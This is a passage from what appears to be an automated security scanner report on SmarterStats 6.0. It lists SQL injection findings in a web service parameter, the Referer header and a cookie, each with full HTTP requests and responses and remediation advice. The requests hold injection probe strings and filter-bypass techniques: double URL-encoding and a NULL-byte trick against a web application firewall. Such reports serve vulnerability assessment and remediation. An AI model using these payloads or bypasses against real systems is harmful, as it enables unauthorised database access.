at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=GetSiteStatus'%20and%201%3d2--%20 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:28 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 2807
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>












<span>
Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.
<h2>Method Not Found</h2>
Method 'GetSiteStatus&#39; and 1=2-- ' was not found in service SiteAdmin.
</span>


</body>
</html>

2.20. http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx [op parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Services/SiteAdmin.asmx

Issue detail

The op parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the op parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the op request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /Services/SiteAdmin.asmx?op=AddSite2%2527 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 1

HTTP/2.0 500 Internal Server Error
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7512
Connection: Close

<html>
<head>
<title>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.Xml.Schema.XmlSchemaException: Undefined complexType 'http://schemas.xmlsoap.org/soap/encoding/:Array' is used as a base for complex type restriction.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code>

The source code that generated this unhandled exception can only be shown when compiled in debug mode. To enable this, please follow one of the below steps, then request the URL:<br><br>1. Add a &quot;Debug=true&quot; directive at the top of the file that generated the error. Example:<br><br> &nbsp;&nbsp;&lt;%@ Page Language=&quot;C#&quot; Debug=&quot;true&quot; %&gt;<br><br>or:<br><br>2) Add the following section to the configuration file of your application:<br><br>&lt;configuration&gt;<br> &nbsp;&nbsp;&nbsp;&lt;system.web&gt;<br> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;compilation debug=&quot;true&quot;/&gt;<br> &nbsp;&nbsp;&nbsp;&lt;/system.web&gt;<br>&lt;/configuration&gt;<br><br> Note that this second technique will cause all files within a given application to be compiled in debug mode. The first technique will cause only that particular file to be compiled in debug mode.<br><br>Important: Running applications in debug mode does incur a memory/performance overhead. You should make sure that an application has debugging disabled before deploying into production scenario.</code>

</td>
</tr>
</table>

<br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[XmlSchemaException: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.]
System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e) +26
System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType) +540
System.Xml.Schema.Compiler.Compile() +772
System.Xml.Schema.XmlSchemaSet.Compile() +742
System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile) +1109
System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas) +204
System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +190
System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations) +75
ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e) +2222
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +25
System.Web.UI.Control.LoadRecursive() +95
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2760
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.1

</font>

</body>
</html>
<!--
[XmlSchemaException]: Undefined complexType &#39;http://schemas.xmlsoap.org/soap/encoding/:Array&#39; is used as a base for complex type restriction.
at System.Xml.Schema.XmlSchemaSet.InternalValidationCallback(Object sender, ValidationEventArgs e)
at System.Xml.Schema.Compiler.CompileComplexType(XmlSchemaComplexType complexType)
at System.Xml.Schema.Compiler.Compile()
at System.Xml.Schema.XmlSchemaSet.Compile()
at System.Xml.Serialization.XmlSchemas.Compile(ValidationEventHandler handler, Boolean fullCompile)
at System.Web.Services.Description.SchemaCompiler.Compile(XmlSchemas schemas)
at System.Web.Services.Description.WebServicesInteroperability.AnalyzeDescription(ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at System.Web.Services.Description.WebServicesInteroperability.CheckConformance(WsiProfiles claims, ServiceDescriptionCollection descriptions, BasicProfileViolationCollection violations)
at ASP.defaultwsdlhelpgenerator_aspx.Page_Load(Object sender, EventArgs e)
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
[HttpUnhandledException]: Exception of type &#39;System.Web.HttpUnhandledException&#39; was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.Services.Protocols.DocumentationServerProtocol.WriteReturns(Object[] returnValues, Stream outputStream)
[InvalidOperationException]: The XML Web service help page encountered an internal error.
at System.Web.Services.Protocols.WebServiceHandler.WriteException(Exception e)
at System.Web.Services.Protocols.WebServiceHandler.CoreProcessRequest()
at System.Web.Services.Protocols.SyncSessionlessHandler.ProcessRequest(HttpContext context)
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
-->

Request 2

GET /Services/SiteAdmin.asmx?op=AddSite2%2527%2527 HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Services/SiteAdmin.asmx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 07:01:02 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Length: 2792
Connection: Close



<html>

<head><link rel="alternate" type="text/xml" href="/Services/SiteAdmin.asmx?disco" />

<style type="text/css">

       BODY { color: #000000; background-color: white; font-family: Verdana; margin-left: 0px; margin-top: 0px; }
       #content { margin-left: 30px; font-size: .70em; padding-bottom: 2em; }
       A:link { color: #336699; font-weight: bold; text-decoration: underline; }
       A:visited { color: #6699cc; font-weight: bold; text-decoration: underline; }
       A:active { color: #336699; font-weight: bold; text-decoration: underline; }
       A:hover { color: cc3300; font-weight: bold; text-decoration: underline; }
       P { color: #000000; margin-top: 0px; margin-bottom: 12px; font-family: Verdana; }
       pre { background-color: #e5e5cc; padding: 5px; font-family: Courier New; font-size: x-small; margin-top: -5px; border: 1px #f0f0e0 solid; }
       td { color: #000000; font-family: Verdana; font-size: .7em; }
       h2 { font-size: 1.5em; font-weight: bold; margin-top: 25px; margin-bottom: 10px; border-top: 1px solid #003366; margin-left: -15px; color: #003366; }
       h3 { font-size: 1.1em; color: #000000; margin-left: -15px; margin-top: 10px; margin-bottom: 10px; }
       ul { margin-top: 10px; margin-left: 20px; }
       ol { margin-top: 10px; margin-left: 20px; }
       li { margin-top: 10px; color: #000000; }
       font.value { color: darkblue; font: bold; }
       font.key { color: darkgreen; font: bold; }
       font.error { color: darkred; font: bold; }
       .heading1 { color: #ffffff; font-family: Tahoma; font-size: 26px; font-weight: normal; background-color: #003366; margin-top: 0px; margin-bottom: 0px; margin-left: -30px; padding-top: 10px; padding-bottom: 3px; padding-left: 15px; width: 105%; }
       .button { background-color: #dcdcdc; font-family: Verdana; font-size: 1em; border-top: #cccccc 1px solid; border-bottom: #666666 1px solid; border-left: #cccccc 1px solid; border-right: #666666 1px solid; }
       .frmheader { color: #000000; background: #dcdcdc; font-family: Verdana; font-size: .7em; font-weight: normal; border-bottom: 1px solid #dcdcdc; padding-top: 2px; padding-bottom: 2px; }
       .frmtext { font-family: Verdana; font-size: .7em; margin-top: 8px; margin-bottom: 0px; margin-left: 32px; }
       .frmInput { font-family: Verdana; font-size: 1em; }
       .intro { margin-left: -15px; }

</style>

<title>
   SiteAdmin Web Service
</title></head>

<body>

<div id="content">

<p class="heading1">SiteAdmin</p><br>












<span>
Click <a href="SiteAdmin.asmx">here</a> for a complete list of operations.
<h2>Method Not Found</h2>
Method 'AddSite2%27%27' was not found in service SiteAdmin.
</span>


</body>
</html>

2.21. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1193026117","TopBarSection":"UserSettings"}
Content-Length: 951

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%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%2F6RhNW2k59YbDX%2F7c%2BpglBMKB69UMRHLnBLI%3D&ctl00%24MPH%24txtSiteId=1&ctl00%24MPH%24txtUserName=weirdo&ctl00%24MPH%24txtPassword=LL12345&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%24LanguageList=&__ASYNCPOST=true&

Response 1

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:21 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: SelectedLanguage=; expires=Mon, 12-Oct-2020 01:03:21 GMT; path=/
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 5501

1|#||4|3862|updatePanel|ctl00_UpdatePanel1|
               <div class="CenteredLogin">
                   <div class="ShadowBox">
                       <div class="LoginBox">
                           <div class="LoginTitle">
                               <div class="RoundedPageTitleLeft">
                                   <div class="RoundedPageTitleRight">
                                       <div class="LoginTitleText">
                                           Login to SmarterStats
                                       </div>
                                   </div>
                               </div>
                           </div>
                           <div class="LoginFrame">
                               <div class="RoundedBottom">
                                   <div class="RoundedLeft">
                                       <div class="RoundedRight">
                                           <div class="RoundedBottomLeft">
                                               <div class="RoundedBottomRight">
                                                   <div id="ctl00_TipTextDiv" class="LoginTipTextContainer">
                                                       <div class="TipTextFailure">Login Failed</div>
                                                   </div>
                                                   <div class="LoginSpacer">
                                                   </div>
                                                   <div class="LoginContent">
                                                       
<div class="LoginSetting">
<div class="LoginLabel">
Site ID
</div>
<input name="ctl00$MPH$txtSiteId" type="text" value="1" id="ctl00_MPH_txtSiteId" tabindex="1" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Username
</div>
<input name="ctl00$MPH$txtUserName" type="text" value="weirdo" id="ctl00_MPH_txtUserName" tabindex="2" style="width: 310px" />
</div>
<div class="LoginSetting">
<div class="LoginLabel">
Password<br />
</div>
<input name="ctl00$MPH$txtPassword" type="password" id="ctl00_MPH_txtPassword" tabindex="3" style="width: 310px" />
</div>
<div class="LoginSetting">
<span class="LoginRememberMe">
<input id="ctl00_MPH_chkAutoLogin" type="checkbox" name="ctl00$MPH$chkAutoLogin" checked="checked" tabindex="3" /><label for="ctl00_MPH_chkAutoLogin">Remember me</label>
</span>
</div>

                                                   </div>
                                                   <div class="LoginButtons">
                                                       
<select name="ctl00$BPH$LanguageList" onchange="javascript:setTimeout(&#39;__doPostBack(\&#39;ctl00$BPH$LanguageList\&#39;,\&#39;\&#39;)&#39;, 0)" id="ctl00_BPH_LanguageList" tabindex="3">
   <option selected="selected" value="">Use Browser Language</option>
   <option value="en">English</option>

</select>
<div id="ctl00_BPH_HelpImageButton" class="BBButton"><a class="ButtonBarAnchor" href="http&#x3a;&#x2f;&#x2f;help&#x2e;smartertools&#x2e;com&#x2f;SmarterStats&#x2f;v6&#x2f;default&#x2e;aspx&#x3f;p&#x3d;DA&#x26;v&#x3d;6&#x2e;0&#x2e;3932&#x26;lang&#x3d;en&#x2d;US&#x26;page&#x3d;LoginAdmin" target="helpwindow" onclick="window.open('http\x3a\x2f\x2fhelp\x2esmartertools\x2ecom\x2fSmarterStats\x2fv6\x2fdefault\x2easpx\x3fp\x3dDA\x26v\x3d6\x2e0\x2e3932\x26lang\x3den\x2dUS\x26page\x3dLoginAdmin','helpwindow',''); return false;" tabindex='6'><span class="BBInner">Help</span></a></div>
<div id="ctl00_BPH_LoginImageButton" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='5' onclick=" __doPostBack('ctl00$BPH$LoginImageButton',''); return false;"><span class="BBInner">Login</span></a></div>
<input type="image" name="ctl00$BPH$btnEnterClick" id="ctl00_BPH_btnEnterClick" tabindex="-1" src="/s.gif" alt=" " style="height:1px;width:1px;border-width:0px;" />

                                                   </div>
                                               </div>
                                           </div>
                                       </div>
                                   </div>
                               </div>
                           </div>
                       </div>
                   </div>
                   <div class="LoginLinks">
                       <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>SmarterStats Free 6.0</a> | <a href='http://www.smartertools.com/smarterstats/web-analytics-seo-software.aspx' target='_blank'>Web Log Analytics & SEO Software</a> | &copy; 2010 <a href='http://www.smartertools.com/' target='_blank'>SmarterTools Inc.</a>
                   </div>
               </div>
               
           |0|hiddenField|__LASTFOCUS||0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||688|hiddenField|__VIEWSTATE|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|0|asyncPostBackControlIDs|||0|postBackControlIDs|||20|updatePanelIDs||tctl00$UpdatePanel1,|0|childUpdatePanelIDs|||19|panelsToRefreshIDs||ctl00$UpdatePanel1,|2|asyncPostBackTimeout||90|10|formAction||login.aspx|33|pageTitle||SmarterStats Login - SmarterStats|251|scriptBlock|ScriptContentWithTags|{"text":"\r\n\t\t\t\t\t\t$(document).ready(function() {\r\n\t\t\t\t\t\t\t$(\u0027select\u0027).each(function() {\r\n\t\t\t\t\t\t\t\tif ($(this).width() \u003e 180) $(this).width(180);\r\n\t\t\t\t\t\t\t});\r\n\t\t\t\t\t\t}); ","type":"text/javascript"}|184|scriptBlock|ScriptPath|/ScriptResource.axd?d=J4GaAPvIQnKMlo_D4Qzm0xa_SfNPfhG-b75huVuGxjWeCTjnztP__eaRa_pbROzW4k2QpoHJQ-uBs4nJPYlOSUcDyDiDF_VzNI93UxMsc1qsbj8BlU_60tzY90-zez8Je4ZNE7PKenoQMyfzxRT0cg2&t=41e66e32|19|focus||ctl00_MPH_txtSiteId|

Request 2

POST /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1193026117","TopBarSection":"UserSettings"}
Content-Length: 951

ctl00%24ScriptManager1=ctl00%24UpdatePanel1%7Cctl00%24BPH%24LoginImageButton&__LASTFOCUS=&__EVENTTARGET=ctl00%24BPH%24LoginImageButton&__EVENTARGUMENT=&__VIEWSTATE=%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%2F6RhNW2k59YbDX%2F7c%2BpglBMKB69UMRHLnBLI%3D&ctl00%24MPH%24txtSiteId=1&ctl00%24MPH%24txtUserName=weirdo&ctl00%24MPH%24txtPassword=LL12345&ctl00%24MPH%24chkAutoLogin=on&ctl00%24BPH%24LanguageList=&__ASYNCPOST=true&

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:03:21 GMT
X-AspNet-Version: 4.0.30319
Set-Cookie: SelectedLanguage=; expires=Mon, 12-Oct-2020 01:03:21 GMT; path=/
Set-Cookie: loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; expires=Mon, 12-Oct-2020 01:03:21 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 40
Connection: Close

1|#||4|15|pageRedirect||%2fdefault.aspx|

2.22. http://vulnerable.smarterstats.6.0.host:9999/login.aspx [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /login.aspx

Issue detail

The STHashCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the STHashCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /login.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/default.aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserWorkspace"}%00'

Response 1 (redirected)

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:22:12 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 6129



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
   Message - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Error/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Error" dir="ltr">
<form name="aspnetForm" method="post" action="frmError.aspx?aspxerrorpath=%2fdefault.aspx" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAUSJiN4MkY7ZGVmYXVsdC5hc3B4ZGQCBw8PFgIfAwXRATxwPlRoZSBwYWdlIG9yIHJlc291cmNlIHRoYXQgeW91IGFyZSBhY2Nlc3NpbmcgaXMgdW5hdmFpbGFibGUgb3IgYW4gZXJyb3IgaGFzIG9jY3VycmVkLjwvcD4NCg0KPHA+VGhpcyBlcnJvciBvY2N1cnJlZCBhdCAxMC8xMS8yMDEwIDg6MjI6MTIgUE0gYW5kIGhhcyBiZWVuIGxvZ2dlZC4gUGxlYXNlIGNvbnRhY3QgeW91ciBzeXN0ZW0gYWRtaW5pc3RyYXRvci48L3A+ZGRkB5djj46db2q7LuJFIDXrhDiyvZgtsD/WuKDWWDSXzKE=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
